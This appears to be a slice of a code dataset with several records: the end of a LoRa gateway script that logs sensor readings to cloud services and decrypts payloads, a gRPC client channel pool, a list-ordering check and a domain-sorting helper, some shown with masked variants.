(ch=='$'): #log on Dropbox\n\t\t\t\t\n\t\t\t\tdata = getAllLine()\n\t\t\t\t\n\t\t\t\tprint \"rcv msg to log (\\$) on dropbox: \"+data,\n\t\t\t\tf=open(os.path.expanduser(_telemetrylog_filename),\"a\")\n\t\t\t\tf.write(info_str+' ')\t\n\t\t\t\tf.write(now.isoformat()+'> ')\n\t\t\t\tf.write(data)\n\t\t\t\tf.close()\t\n\n\t\t\t#/////////////////////////////////////////////////////////////\n\t\t\t# YOU CAN MODIFY HERE HOW YOU WANT DATA TO BE PUSHED TO CLOUDS\n\t\t\t# WE PROVIDE 
EXAMPLES FOR THINGSPEAK, GROVESTREAM\n\t\t\t# IT IS ADVISED TO USE A SEPERATE PYTHON SCRIPT PER CLOUD\n\t\t\t#////////////////////////////////////////////////////////////\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\telif (ch=='&' and _firebase): #log on Firebase\n\t\t\t\t\n\t\t\t\tldata = getAllLine()\n\t\t\t\t\n\t\t\t\tprint 'rcv msg to log (\\&) on firebase: '+data\n\t\t\t\tfirebase_msg = {\n\t\t\t\t\t'dst':dst,\n\t\t\t\t\t'type':ptypestr,\n\t\t\t\t\t'gateway_eui' : _gwaddr,\t\t\t\t\t\n\t\t\t\t\t'node_eui':src,\n\t\t\t\t\t'seq':seq,\n\t\t\t\t\t'len':datalen,\n\t\t\t\t\t'snr':SNR,\n\t\t\t\t\t'rssi':RSSI,\n\t\t\t\t\t'cr' : cr, \n\t\t\t\t\t'datarate' : \"SF\"+str(sf)+\"BW\"+str(bw),\n\t\t\t\t\t'time':now.isoformat(),\n\t\t\t\t\t'info_str':info_str+' '+now.isoformat()+'> '+ldata,\t\t\t\t\t\n\t\t\t\t\t'data':ldata\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tif _mongodb :\n\t\t\t\t\t#------------------\n\t\t\t\t\t#saving in MongoDB\n\t\t\t\t\t#------------------\n\t\t\t\t\t\n\t\t\t\t\t#get the data\n\t\t\t\t\tdata = ldata.split('/')\n\t\t\t\t\n\t\t\t\t\t#change data in two arrays : nomenclature_array and value_array\n\t\t\t\t\titeration = 0\n\t\t\t\t\tnomenclature_array = []\n\t\t\t\t\tvalue_array = []\n\t\t\t\t\twhile iteration<len(data) :\n\t\t\t\t\t\tif (iteration == 0 or iteration%2 == 0) :\n\t\t\t\t\t\t \tnomenclature_array.append(data[iteration])\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t \tvalue_array.append(data[iteration])\n\t\t\t\t\t\t \t\n\t\t\t\t\t\titeration += 1\n\t\t\t\t\n\t\t\t\t\t#check if new month\n\t\t\t\t\tremove_if_new_month(now)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving the document in the collection...\")\n\t\t\t\t\n\t\t\t\t\t#saving data in a JSON var\n\t\t\t\t\tstr_json_data = \"{\"\n\t\t\t\t\titeration = 0\n\t\t\t\t\twhile iteration < len(nomenclature_array) :\n\t\t\t\t\t\t#last iteration, do not add \",\" at the end\n\t\t\t\t\t\tif iteration == len(nomenclature_array)-1 :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+nomenclature_array[iteration]+\"\\\" : 
\"+value_array[iteration]\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+nomenclature_array[iteration]+\"\\\" : \"+value_array[iteration]+\", \"\n\t\t\t\t\t\titeration += 1\n\t\t\t\t\tstr_json_data += \"}\"\n\t\t\t\t\n\t\t\t\t\t#creating document to add\n\t\t\t\t\tdoc = {\n\t\t\t\t\t\t\"type\" : ptypestr,\n\t\t\t\t\t\t\"gateway_eui\" : _gwaddr, \n\t\t\t\t\t\t\"node_eui\" : src,\n\t\t\t\t\t\t\"snr\" : SNR, \n\t\t\t\t\t\t\"rssi\" : RSSI, \n\t\t\t\t\t\t\"cr\" : cr, \n\t\t\t\t\t\t\"datarate\" : \"SF\"+str(sf)+\"BW\"+str(bw), \n\t\t\t\t\t\t\"time\" : now,\n\t\t\t\t\t\t\"data\" : json.dumps(json.loads(str_json_data))\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t#adding the document\n\t\t\t\t\tadd_document(doc)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving done\")\n\t\t\t\t\n\t\t\t\tsensor_entry='sensor%d'% (src)\n\t\t\t\tmsg_entry='msg%d' % (seq)\t\n\t\t\t\t\n\t\t\t\t#upload data to firebase\n\t\t\t\tfirebase_uploadSingleData(firebase_msg, sensor_entry, msg_entry, now)\n\t\t\t\t\n\t\t\telif (ch=='!'): #log on thingspeak, grovestreams, sensorcloud and connectingnature\n\t\n\t\t\t\tldata = getAllLine()\n\t\t\t\t\n\t\t\t\t# get number of '#' separator\n\t\t\t\tnsharp = ldata.count('#')\t\t\t\n\t\t\t\t#no separator\n\t\t\t\tif nsharp==0:\n\t\t\t\t\t#will use default channel and field\n\t\t\t\t\tdata=['','']\n\t\t\t\t\t\n\t\t\t\t\t#contains ['', '', \"s1\", s1value, \"s2\", s2value, ...]\n\t\t\t\t\tdata_array = data + re.split(\"/\", ldata)\t\t\n\t\t\t\telif nsharp==1:\n\t\t\t\t\t#only 1 separator\n\t\t\t\t\t\n\t\t\t\t\tdata_array = re.split(\"#|/\", ldata)\n\t\t\t\t\t\n\t\t\t\t\t#if the first item has length > 1 then we assume that it is a channel write key\n\t\t\t\t\tif len(data_array[0])>1:\n\t\t\t\t\t\t#insert '' to indicate default field\n\t\t\t\t\t\tdata_array.insert(1,'');\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\t#insert '' to indicate default channel\n\t\t\t\t\t\tdata_array.insert(0,'');\t\t\n\t\t\t\telse:\n\t\t\t\t\t#contains [channel, field, \"s1\", s1value, \"s2\", 
s2value, ...]\n\t\t\t\t\tdata_array = re.split(\"#|/\", ldata)\t\n\t\t\t\t\t\n\t\t\t\t#just in case we have an ending CR or 0\n\t\t\t\tdata_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\\n', '')\n\t\t\t\tdata_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\\0', '')\t\n\t\t\t\t\n\t\t\t\t#test if there are characters at the end of each value, then delete these characters\n\t\t\t\ti = 3\n\t\t\t\twhile i < len(data_array) :\n\t\t\t\t\twhile not data_array[i][len(data_array[i])-1].isdigit() :\n\t\t\t\t\t\tdata_array[i] = data_array[i][:-1]\n\t\t\t\t\ti += 2\n\t\t\t\t\n\t\t\t\tif _mongodb :\t\n\t\t\t\t\t#------------------\n\t\t\t\t\t#saving in MongoDB\n\t\t\t\t\t#------------------\n\t\t\t\t\n\t\t\t\t\t#check if new month\n\t\t\t\t\tremove_if_new_month(now)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving the document in the collection...\")\n\t\t\t\t\t\n\t\t\t\t\t#saving data in a JSON var\n\t\t\t\t\tstr_json_data = \"{\"\n\t\t\t\t\t#start from the first nomenclature\n\t\t\t\t\titeration = 2\n\t\t\t\t\twhile iteration < len(data_array)-1 :\n\t\t\t\t\t\t#last iteration, do not add \",\" at the end\n\t\t\t\t\t\tif iteration == len(data_array)-2 :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+data_array[iteration]+\"\\\" : \"+data_array[iteration+1]\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+data_array[iteration]+\"\\\" : \"+data_array[iteration+1]+\", \"\n\t\t\t\t\t\titeration += 2\n\t\t\t\t\tstr_json_data += \"}\"\n\t\t\t\t\n\t\t\t\t\t#creating document to add\n\t\t\t\t\tdoc = {\n\t\t\t\t\t\t\"type\" : ptypestr,\n\t\t\t\t\t\t\"gateway_eui\" : _gwaddr, \n\t\t\t\t\t\t\"node_eui\" : src,\n\t\t\t\t\t\t\"snr\" : SNR, \n\t\t\t\t\t\t\"rssi\" : RSSI, \n\t\t\t\t\t\t\"cr\" : cr, \n\t\t\t\t\t\t\"datarate\" : \"SF\"+str(sf)+\"BW\"+str(bw),\n\t\t\t\t\t\t\"time\" : now,\n\t\t\t\t\t\t\"data\" : json.dumps(json.loads(str_json_data))\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t#adding the 
document\n\t\t\t\t\tadd_document(doc)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving done\")\n\n\t\t\t\t# get number of '/' separator\n\t\t\t\tnslash = ldata.count('/')\n\t\t\t\t\n\t\t\t\tindex_first_data = 2\n\t\t\t\t\n\t\t\t\tif nslash==0:\n\t\t\t\t\t# old syntax without nomenclature key\n\t\t\t\t\tindex_first_data=2\n\t\t\t\telse:\n\t\t\t\t\t# new syntax with nomenclature key\t\t\t\t\n\t\t\t\t\tindex_first_data=3\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t#------------------\n\t\t\t\t#test for thingspeak\n\t\t\t\t#------------------\t\t\t\t \n\t\t\t\tif (_thingspeak):\n\t\t\t\t\t\t\n\t\t\t\t\tsecond_data=str(seq)\n\t\t\t\t\n\t\t\t\t\tif (_thingspeaksnr):\n\t\t\t\t\t\tsecond_data=str(SNR)\n\t\t\t\t\t\n\t\t\t\t\t#data to send to thingspeak\n\t\t\t\t\tdata = []\n\t\t\t\t\tdata.append(data_array[0]) #channel (if '' default)\n\t\t\t\t\tdata.append(data_array[1]) #field (if '' default)\t\t\n\t\t\t\t\t\n\t\t\t\t\tdata.append(data_array[index_first_data]) #value to add (the first sensor value in data_array)\n\t\t\t\t\t\n\t\t\t\t\t#upload data to thingspeak\n\t\t\t\t\t#JUST FOR UPLOAD A SINGLE DATA IN A SPECIFIC FIELD AND SECOND DATA\t\t\t\t\t\n\t\t\t\t\tthingspeak_uploadSingleData(data, second_data) \n\n\t\t\t\t\t# if you want to upload all data starting at field 1, uncomment next line, and comment previous line\n\t\t\t\t\t#thingspeak_uploadMultipleData(data_array) # upload all data in the fields\n\t\t\t\n\t\t\t\t#------------------\n\t\t\t\t#test for FIWARE \n\t\t\t\t#need FIWARE access\n\t\t\t\t#------------------\t\t\t\t \n\t\t\t\tif (_fiware):\n\t\t\t\t\tprint(\"FIWARE: upload\")\n\t\t\t\t\t#entity_id = 'test_item_'+now.isoformat()\n\t\t\t\t\tentity_id = 'sensor%d'% (src)\n\t\t\t\t\t#send the first sensor value in data_array\n\t\t\t\t\tcmd = 'python ./fiware_UpdateEntityAttribute.py '+entity_id+' test temperature float '+data_array[index_first_data]\n\t\t\t\t\n\t\t\t\t\tprint(\"FiWare: will issue python script\")\n\t\t\t\t\tprint(cmd)\n\t\t\t\t\targs = 
cmd.split()\n\t\t\t\t\ttry:\n\t\t\t\t\t\tout = subprocess.check_output(args, shell=False)\n\t\t\t\t\texcept subprocess.CalledProcessError:\n\t\t\t\t\t\tprint(\"FiWare: python script failed\")\n\t \t\t\t\n\t\t\t\t\tif out.find('\"reasonPhrase\" : \"OK\"') > 0:\n\t\t\t\t\t\tprint(\"FiWare: Entity updated with ENTITY_ID \"+entity_id)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"FiWare: Entity update failed\")\n\n\t\t\t\t#------------------\n\t\t\t\t#test for sensorcloud \n\t\t\t\t#------------------\n\t\t\t\tif (_sensorcloud) :\n\t\t\t\t\t#send the first sensor value in data_array\n\t\t\t\t\tsensorcloud_uploadSingleData(data_array[index_first_data])\n\n\t\t\t\t#------------------\n\t\t\t\t#test for grovestreams \n\t\t\t\t#------------------\t\t\t\t \n\t\t\t\tif (_grovestreams):\n\t\t\t\t\n\t\t\t\t\tnomenclatures = []\n\t\t\t\t\tdata = []\n\t\t\t\t\t\n\t\t\t\t\tif nslash==0:\n\t\t\t\t\t\t# old syntax without nomemclature key, so insert only one key\n\t\t\t\t\t\tnomenclatures.append(\"temp\")\n\t\t\t\t\t\tdata.append(data_array[index_first_data])\n\t\t\t\t\telse:\n\t\t\t\t\t\t#completing nomenclatures and data\n\t\t\t\t\t\ti=2\n\t\t\t\t\t\twhile i < len(data_array)-1 :\n\t\t\t\t\t\t\tnomenclatures.append(data_array[i])\n\t\t\t\t\t\t\tdata.append(data_array[i+1])\n\t\t\t\t\t\t\ti += 2\n\t\t\t\t\t\n\t\t\t\t\t#upload data to grovestreams\n\t\t\t\t\tgrovestreams_uploadSingleData(nomenclatures, data, str(src))\n\t\t\t\t\t\n\n\t\t\t# END\n\t\t\t#////////////////////////////////////////////////////////////\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\telse: # not a known data logging prefix\n\t\t\t\t#you may want to upload to a default service\n\t\t\t\t#so just implement it here\n\t\t\t\tprint('unrecognized data logging prefix: discard data')\n\t\t\t\tgetAllLine() \n\t\t\t\t\t\n\t\telse:\n\t\t\tprint('invalid app key: discard data')\n\t\t\tgetAllLine()\n\n\t\tcontinue\n\t\n\t# handle binary prefixes\n\tif (ch == '\\xFF' or ch == '+'):\n\t#if (ch == '\\xFF'):\n\t\n\t\tprint(\"got 
first framing byte\")\n\t\tch=getSingleChar()\t\n\t\t\n\t\t# data prefix for non-encrypted data\n\t\tif (ch == '\\xFE' or ch == '+'):\t\t\t\n\t\t#if (ch == '\\xFE'):\n\t\t\t#the data prefix is inserted by the gateway\n\t\t\t#do not modify, unless you know what you are doing and that you modify lora_gateway (comment WITH_DATA_PREFIX)\n\t\t\tprint(\"--> got data prefix\")\n\t\t\t\n\t\t\t#we actually need to use DATA_PREFIX in order to differentiate data from radio coming to the post-processing stage\n\t\t\t#if _wappkey is set then we have to first indicate that _validappkey=0\n\t\t\tif (_wappkey==1):\n\t\t\t\t_validappkey=0\n\t\t\telse:\n\t\t\t\t_validappkey=1\t\n\n\t\t\t# if we have raw output from gw, then try to determine which kind of packet it is\n\t\t\tif (_rawFormat==1):\n\t\t\t\tch=getSingleChar()\n\t\t\t\t\n\t\t\t\t# probably our modified Libelium header where the destination is the gateway\n\t\t\t\t# dissect our modified Libelium format\n\t\t\t\tif ch==1:\t\t\t\n\t\t\t\t\tdst=ord(ch)\n\t\t\t\t\tptype=ord(getSingleChar())\n\t\t\t\t\tsrc=ord(getSingleChar())\n\t\t\t\t\tseq=ord(getSingleChar())\n\t\t\t\t\tprint(\"Libelium[dst=%d ptype=0x%.2X src=%d seq=%d]\" % (dst,ptype,src,seq))\n\t\t\t\t\t# now we read datalen-4 (the header length) bytes in our line buffer\n\t\t\t\t\tfillLinebuf(datalen-HEADER_SIZE)\t\t\t\t\n\t\t\t\t\n\t\t\t\t# TODO: dissect LoRaWAN\n\t\t\t\t# you can implement LoRaWAN decoding if this is necessary for your system\n\t\t\t\t# look at the LoRaWAN packet format specification to dissect the packet in detail\n\t\t\t\t# \n\t\t\t\t# LoRaWAN uses the MHDR(1B)\n\t\t\t\t# ----------------------------\n\t\t\t\t# | 7 6 5 | 4 3 2 | 1 0 |\n\t\t\t\t# ----------------------------\n\t\t\t\t# MType RFU major\n\t\t\t\t#\n\t\t\t\t# the main MType is unconfirmed data up which value is 010\n\t\t\t\tif (ch & 0x40)==0x40:\n\t\t\t\t\t# Do the LoRaWAN decoding\n\t\t\t\t\tprint(\"LoRaWAN?\")\n\t\t\t\t\t# for the moment just discard the 
data\n\t\t\t\t\tfillLinebuf(datalen-1)\n\t\t\t\t\tgetAllLine()\n\t\t\telse:\t\t\t\t\t\t\t\t\n\t\t\t\t# now we read datalen bytes in our line buffer\n\t\t\t\tfillLinebuf(datalen)\t\t\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t# encrypted data payload?\n\t\t\tif ((ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED):\n\t\t\t\tprint(\"--> DATA encrypted: encrypted payload size is %d\" % datalen)\n\t\t\t\t\n\t\t\t\t_hasClearData=0\n\t\t\t\t\n\t\t\t\tif _aes==1:\n\t\t\t\t\tprint(\"--> decrypting\")\n\t\t\t\t\t\n\t\t\t\t\tdecrypt_handler = AES.new(aes_key, AES.MODE_CBC, aes_iv)\n\t\t\t\t\t# decrypt \n\t\t\t\t\ts = decrypt_handler.decrypt(_linebuf)\n\t\t\t\t\t\n\t\t\t\t\tfor i in range(0, len(s)):\n\t\t\t\t\t\tprint \"%.2X \" % ord(s[i]),\n\t\t\t\t\t\n\t\t\t\t\tprint \"\\nEnd\"\n\t\t\t\t\t\t\n\t\t\t\t\t# get the real (decrypted) payload size\n\t\t\t\t\trsize = ord(s[APPKEY_SIZE])\n\t\t\t\t\t\n\t\t\t\t\tprint(\"--> real payload size is %d\" % rsize)\n\t\t\t\t\t\n\t\t\t\t\t# then add the appkey + the appkey framing bytes\n\t\t\t\t\trsize = rsize+APPKEY_SIZE+1\n\t\t\t\t\t\n\t\t\t\t\t_linebuf = s[:APPKEY_SIZE] + s[APPKEY_SIZE+1:rsize]\n\t\t\t\t\t\n\t\t\t\t\tfor i in range(0, len(_linebuf)):\n\t\t\t\t\t\tprint \"%.2X \" % ord(_linebuf[i]),\n\t\t\t\t\t\n\t\t\t\t\tprint \"\\nEnd\"\n\t\t\t\t\t\t\n\t\t\t\t\t# normally next read from input will get data from the decrypted _linebuf\n\t\t\t\t\tprint \"--> decrypted payload is: \",\n\t\t\t\t\tprint _linebuf[APPKEY_SIZE:]\n\t\t\t\t\t\n\t\t\t\t\t_hasClearData=1\n\t\t\t\telse:\n\t\t\t\t\tprint(\"--> DATA encrypted: aes not activated\")\n\t\t\t\t\t# drain stdin of all the encrypted data\n\t\t\t\t\tenc_data=getAllLine()\n\t\t\t\t\tprint(\"--> discard encrypted data\")\n\t\t\telse:\n\t\t\t\t_hasClearData=1\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t# with_appkey?\n\t\t\tif ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY and _hasClearData==1): \n\t\t\t\tprint(\"--> DATA with_appkey: read app key sequence\")\n\t\t\t\t\n\t\t\t\tthe_app_key = 
getSingleChar()\n\t\t\t\tthe_app_key = the_app_key + getSingleChar()\n\t\t\t\tthe_app_key = the_app_key + getSingleChar()\n\t\t\t\tthe_app_key = the_app_key + getSingleChar()\n\t\t\t\t\n\t\t\t\tprint \"app key is \",\n\t\t\t\tprint \" \".join(\"0x{:02x}\".format(ord(c)) for c in the_app_key)\n\t\t\t\t\n\t\t\t\tif the_app_key in app_key_list:\n\t\t\t\t\tprint(\"in app key list\")\n\t\t\t\t\tif _wappkey==1:\n\t\t\t\t\t\t_validappkey=1\n\t\t\t\telse:\t\t\n\t\t\t\t\tprint(\"not in app key list\")\n\t\t\t\t\tif _wappkey==1:\n\t\t\t\t\t\t_validappkey=0\n\t\t\t\t\telse:\t\n\t\t\t\t\t\t#we do not check for app key\n\t\t\t\t\t\t_validappkey=1\n\t\t\t\t\t\tprint(\"but app key disabled\")\t\t\t\t\n\t\t\t\t\n\t\t\tcontinue\n\t\t\t\n\tif (ch == '?' and _ignoreComment==1):\n\t\tsys.stdin.readline()\n\t\tcontinue\n\t\n\tsys.stdout.write(ch)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
def play_43():
n=int(input('Enter n :'))
l=[]
for i in range(n):
l.append(int(input()))
for i in range(n-1):
for j in range(i+1,n):
if l[i]<l[j]:
continue
return "no"
return "Yes"
play_43()
|
normal
|
{
"blob_id": "1605396a6edb31dd6fe9238a0506f8cfeb794d07",
"index": 5568,
"step-1": "<mask token>\n",
"step-2": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\n<mask token>\n",
"step-3": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\nplay_43()\n",
"step-4": "def play_43():\n\tn=int(input('Enter n :'))\n\tl=[]\n\tfor i in range(n):\n\t\tl.append(int(input()))\n\tfor i in range(n-1):\n\t\tfor j in range(i+1,n):\n\t\t\tif l[i]<l[j]:\n\t\t\t\tcontinue\n\t\t\treturn \"no\"\n\treturn \"Yes\"\nplay_43()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import server_pb2
import atexit
from grpc.beta import implementations
from random import randint
from grpc._adapter._types import ConnectivityState
global _pool
_pool = dict()
class ChannelPool(object):
def __init__(self, host, port, pool_size):
self.host = host
self.port = port
self.pool_size = pool_size
self.channels = []
self.stubs = []
# only index, no ref!
# and this is a stub rank!
self.working_channel_indexs = set()
self.connect()
def flush_channels(self):
# call this method to check all the channels status
# if channel connection is failed or idle
# we could try to reconnect sometime
channels = [self.channels[i] for i in self.working_channel_indexs]
for channel in channels:
try:
state = channel._low_channel.check_connectivity_state(True)
if state == ConnectivityState.CONNECTING:
self.on_channel_connection(channel, state)
elif state == ConnectivityState.TRANSIENT_FAILURE:
self.on_transient_failure(channel, state)
elif state == ConnectivityState.FATAL_FAILURE:
self.on_fatal_failure(channel, state)
else:
self.on_success(channel, state)
except Exception, e:
self.on_exception(channel, state, e)
def on_channel_connection(self, channel, state):
pass
def on_transient_failure(self, channel, state):
pass
def on_fatal_failure(self, channel, state):
pass
def on_success(self, channel, state):
pass
def on_exception(self, channel, state, e):
pass
def connect(self):
for i in range(self.pool_size):
channel = implementations.insecure_channel(self.host, self.port)
stub = server_pb2.beta_create_SimpleService_stub(channel)
# we need to make channels[i] == stubs[i]->channel
self.channels.append(channel)
self.stubs.append(stub)
def shutdown(self):
for channel in self.channels:
del channel
del self.channels
for stub in self.stubs:
del stub
del self.stubs
self.channels = []
self.stubs = []
def get_stub(self):
index = randint(0, self.pool_size - 1)
self.working_channel_indexs.add(index)
return self.stubs[index]
def __del__(self):
self.shutdown()
class ClientImpl(object):
def __init__(self, host='0.0.0.0', port=50051, size=1):
self.pool = ChannelPool(host, port, size)
self.pool.connect()
self.register()
def register(self):
key = str(id(self))
value = self
if _pool.get(key):
old_obj = _pool.get(key)
del old_obj
_pool[key] = value
def shutdown(self):
self.pool.shutdown()
@property
def stub(self):
return self.pool.get_stub()
def hello(self, words, with_call=False):
request = server_pb2.HelloRequest(say=words)
return self.stub.Hello(request, 3, with_call=with_call)
Hello = hello
def get_client():
if _pool:
key = _pool.keys()[0]
return _pool[key]
client = ClientImpl()
return client
def exit_handler():
# this is a gRPC python bug
# so we need to end everything
# when app close
for _, obj in _pool.items():
obj.shutdown()
atexit.register(exit_handler)
|
normal
|
{
"blob_id": "aec45936bb07277360ea1a66b062edc4c282b45a",
"index": 4097,
"step-1": "import server_pb2\n\nimport atexit\n\nfrom grpc.beta import implementations\nfrom random import randint\nfrom grpc._adapter._types import ConnectivityState\n\nglobal _pool\n_pool = dict()\n\n\nclass ChannelPool(object):\n\n def __init__(self, host, port, pool_size):\n self.host = host\n self.port = port\n self.pool_size = pool_size\n self.channels = []\n self.stubs = []\n # only index, no ref!\n # and this is a stub rank!\n self.working_channel_indexs = set()\n self.connect()\n\n def flush_channels(self):\n # call this method to check all the channels status\n # if channel connection is failed or idle\n # we could try to reconnect sometime\n channels = [self.channels[i] for i in self.working_channel_indexs]\n for channel in channels:\n try:\n state = channel._low_channel.check_connectivity_state(True)\n if state == ConnectivityState.CONNECTING:\n self.on_channel_connection(channel, state)\n elif state == ConnectivityState.TRANSIENT_FAILURE:\n self.on_transient_failure(channel, state)\n elif state == ConnectivityState.FATAL_FAILURE:\n self.on_fatal_failure(channel, state)\n else:\n self.on_success(channel, state)\n except Exception, e:\n self.on_exception(channel, state, e)\n\n def on_channel_connection(self, channel, state):\n pass\n\n def on_transient_failure(self, channel, state):\n pass\n\n def on_fatal_failure(self, channel, state):\n pass\n\n def on_success(self, channel, state):\n pass\n\n def on_exception(self, channel, state, e):\n pass\n\n def connect(self):\n for i in range(self.pool_size):\n channel = implementations.insecure_channel(self.host, self.port)\n stub = server_pb2.beta_create_SimpleService_stub(channel)\n # we need to make channels[i] == stubs[i]->channel\n self.channels.append(channel)\n self.stubs.append(stub)\n\n def shutdown(self):\n for channel in self.channels:\n del channel\n del self.channels\n for stub in self.stubs:\n del stub\n del self.stubs\n self.channels = []\n self.stubs = []\n\n def get_stub(self):\n index = 
randint(0, self.pool_size - 1)\n self.working_channel_indexs.add(index)\n return self.stubs[index]\n\n def __del__(self):\n self.shutdown()\n\n\nclass ClientImpl(object):\n def __init__(self, host='0.0.0.0', port=50051, size=1):\n self.pool = ChannelPool(host, port, size)\n self.pool.connect()\n self.register()\n\n def register(self):\n key = str(id(self))\n value = self\n if _pool.get(key):\n old_obj = _pool.get(key)\n del old_obj\n _pool[key] = value\n\n def shutdown(self):\n self.pool.shutdown()\n\n @property\n def stub(self):\n return self.pool.get_stub()\n\n def hello(self, words, with_call=False):\n request = server_pb2.HelloRequest(say=words)\n return self.stub.Hello(request, 3, with_call=with_call)\n\n Hello = hello\n\n\ndef get_client():\n if _pool:\n key = _pool.keys()[0]\n return _pool[key]\n client = ClientImpl()\n return client\n\n\ndef exit_handler():\n # this is a gRPC python bug\n # so we need to end everything\n # when app close\n for _, obj in _pool.items():\n obj.shutdown()\n\natexit.register(exit_handler)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = '(.*\\.)?(.*\\.)(.*)'
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
domain_values = domain_search.group(2), domain_search.group(3
), domain_search.group(1)
key = '%s%s%s' % domain_values
else:
key = domain
return key
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = '(.*\\.)?(.*\\.)(.*)'
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
domain_values = domain_search.group(2), domain_search.group(3
), domain_search.group(1)
key = '%s%s%s' % domain_values
else:
key = domain
return key
<|reserved_special_token_0|>
print('before: %s' % domains.__repr__())
domains.sort(key=domain_sort_key)
print('after: %s' % domains.__repr__())
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = '(.*\\.)?(.*\\.)(.*)'
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
domain_values = domain_search.group(2), domain_search.group(3
), domain_search.group(1)
key = '%s%s%s' % domain_values
else:
key = domain
return key
domains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']
print('before: %s' % domains.__repr__())
domains.sort(key=domain_sort_key)
print('after: %s' % domains.__repr__())
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = r'(.*\.)?(.*\.)(.*)' # Eg: (www.)(google.)(com)
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
# sort by domain name and then everything left of
# Eg: google, com, www
domain_values = (
domain_search.group(2),
domain_search.group(3),
domain_search.group(1)
)
key = '%s%s%s' % domain_values
else:
# no host portion, just return the domain name
key = domain
return(key)
domains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']
print('before: %s' % domains.__repr__())
domains.sort(key=domain_sort_key)
print('after: %s' % domains.__repr__())
|
flexible
|
{
"blob_id": "c581d9714681e22c75b1eeb866ea300e87b883f1",
"index": 2972,
"step-1": "<mask token>\n",
"step-2": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = '(.*\\\\.)?(.*\\\\.)(.*)'\n domain_search = re.search(domain_expr, domain)\n if domain_search and domain_search.group(1):\n domain_values = domain_search.group(2), domain_search.group(3\n ), domain_search.group(1)\n key = '%s%s%s' % domain_values\n else:\n key = domain\n return key\n\n\n<mask token>\n",
"step-3": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = '(.*\\\\.)?(.*\\\\.)(.*)'\n domain_search = re.search(domain_expr, domain)\n if domain_search and domain_search.group(1):\n domain_values = domain_search.group(2), domain_search.group(3\n ), domain_search.group(1)\n key = '%s%s%s' % domain_values\n else:\n key = domain\n return key\n\n\n<mask token>\nprint('before: %s' % domains.__repr__())\ndomains.sort(key=domain_sort_key)\nprint('after: %s' % domains.__repr__())\n",
"step-4": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = '(.*\\\\.)?(.*\\\\.)(.*)'\n domain_search = re.search(domain_expr, domain)\n if domain_search and domain_search.group(1):\n domain_values = domain_search.group(2), domain_search.group(3\n ), domain_search.group(1)\n key = '%s%s%s' % domain_values\n else:\n key = domain\n return key\n\n\ndomains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']\nprint('before: %s' % domains.__repr__())\ndomains.sort(key=domain_sort_key)\nprint('after: %s' % domains.__repr__())\n",
